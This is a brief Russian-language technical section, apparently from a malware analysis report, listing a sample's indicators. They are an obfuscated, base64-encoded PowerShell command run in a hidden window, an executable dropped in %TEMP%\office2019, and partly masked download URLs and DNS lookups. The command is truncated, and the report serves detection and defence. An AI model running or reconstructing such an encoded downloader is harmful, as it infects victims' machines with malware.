Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBADEAYQA5ADUAbQAzAD0AKAAnAFkAJwArACcAaQAnACsAJwBhAHEAeAA4ADcAJwApADsAJgAoACcAbgBlACcAKwAnAHcALQBpAHQAZQBtACcAKQAgACQARQBuAHYAOgBUAGUAbQBwAFwAbwBGAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\padovoqv3.exe
- %TEMP%\office2019\padovoqv3.exe
- 'an######demarqueteria.com':443
- http://es###icht.com/Carsten/JhAUO/
- http://ho##y.com/cgi-bin/jXbWR/
- http://f8###puter.de/Organisation/xV3/
- http://pe###ovil.com/wp-admin/WLpuIk/
- http://vo###hme.com/cgi-bin/NVzNNhc/
- http://www.in###ainbow.com/z0g/
- DNS ASK es###icht.com
- DNS ASK ho##y.com
- DNS ASK f8###puter.de
- DNS ASK pe###ovil.com
- DNS ASK vo###hme.com
- DNS ASK in###ainbow.com
- DNS ASK an######demarqueteria.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBADEAYQA5ADUAbQAzAD0AKAAnAFkAJwArACcAaQAnACsAJwBhAHEAeAA4ADcAJwApADsAJgAoACcAbgBlACcAKwAnAHcALQBpAHQAZQBtACcAKQAgACQARQBuAHYAOgBUAGUAbQBwAFwAbwBGAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)